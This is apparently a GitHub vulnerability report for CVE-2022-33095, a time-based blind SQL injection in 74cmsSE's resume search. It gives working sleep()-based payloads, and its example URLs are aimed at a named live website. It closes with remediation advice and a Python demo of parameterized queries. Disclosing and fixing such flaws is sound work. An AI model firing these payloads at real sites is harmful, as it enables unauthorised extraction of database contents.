CVE-2022-33095: SQL Injection vulnerability · Issue #5 · PAINCLOWN/74cmsSE-Arbitrary-File-Reading
74cmsSE v3.5.1 was discovered to contain a SQL injection vulnerability via the keyword parameter at /home/jobfairol/resumelist.
Exploit Title: SQL Injection vulnerability in 74cmsSE_v3.4.1
Date of Discovery: 5/5/2022
Product version: 74cmsSE_v3.4.1
Download link: http://www.74cms.com/downloadse/show/id/62.html
Vulnerability Description:
74cmsSE_v3.4.1 contains a time-based blind SQL injection that allows an attacker to run attacker-controlled SQL statements against the database and, by measuring response delays, extract sensitive database data.
POC:
Payload:
/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select(0)from(select(sleep(2)))v)%2B%27/
In the path
/v1_0/home/jobfairol/resumelist
the $keyword parameter is not strictly filtered before it is placed into the SQL query, resulting in SQL injection.
exp1:
https://www.jllxg.com/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select(0)from(select(sleep(2)))v)%2B%27
As the figure shows, the response is delayed by about two seconds, so the sleep() function was executed and the parameter is vulnerable to time-based blind SQL injection.
With this payload, sleep() appears to be executed only once, which is why the delay is roughly 2 seconds rather than a multiple of it.
A time-based blind injection can also be used to infer the length of the database name:
exp2:
https://www.jllxg.com/v1_0/home/jobfairol/resumelist?jobfair_id=2&keyword=%27%2B(select%20if(now()=sysdate(),sleep(length(database())),0))%2B%27
As shown in the following figure, the database name of the site was already known to be "hsjp" from the arbitrary file read vulnerability (the subject of this repository), and the observed delay is exactly length(database()) = 4 seconds, so the injection is confirmed.
This is a time-based blind SQL injection.
Suggestion: Add validation and filtering for this parameter, and bind it with a parameterized query (prepared statement) instead of concatenating it into the SQL string; a filter alone is a weaker fix than parameterization.
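To make the remediation concrete, here is an added example (not code from 74cmsSE, which is PHP on MySQL) that runs the page's exp1 payload through a concatenated query and through a parameterized one. SQLite is used only as an offline stand-in, and the table, rows and function names are constructed for the demonstration; in SQLite the injected text is still parsed as SQL (it fails on MySQL's sleep(), which SQLite does not have), while the bound parameter is treated purely as a search string.

```python
"""Concatenated vs. parameterized query for the `keyword` search.

Added example, not code from the 74cmsSE project. SQLite stands in for
MySQL so both query styles can be run offline; table, rows and helper
names are constructed for the demonstration.
"""
import sqlite3

# exp1 payload from the page, URL-decoded
PAYLOAD = "'+(select(0)from(select(sleep(2)))v)+'"


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table resume (id integer primary key, title text)")
    conn.executemany(
        "insert into resume (title) values (?)",
        [("java developer",), ("php developer",), ("hr specialist",)],
    )
    return conn


def vulnerable_search(conn, keyword):
    """Concatenates the keyword into the statement, as the advisory describes."""
    sql = f"select id, title from resume where title like '%{keyword}%'"
    try:
        return "rows", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # The injected text reached the SQL parser: the engine tried to
        # resolve sleep() as a function, proving the query was rewritten.
        return "sql_error", str(exc)


def safe_search(conn, keyword):
    """Binds the keyword as data; the quote and subquery are just characters."""
    rows = conn.execute(
        "select id, title from resume where title like ?", (f"%{keyword}%",)
    ).fetchall()
    return "rows", rows


def compare(keyword):
    """Outcome of both query styles for one keyword (fresh database each time)."""
    conn = setup()
    return {
        "vulnerable": vulnerable_search(conn, keyword)[0],
        "safe": safe_search(conn, keyword)[0],
    }


if __name__ == "__main__":
    print(compare("php"))     # both styles return rows
    print(compare(PAYLOAD))   # concatenated: sql_error; parameterized: rows
```

The parameterized version cannot be made to run the injected subquery no matter what the keyword contains, which is why it belongs in the fix alongside any input filter.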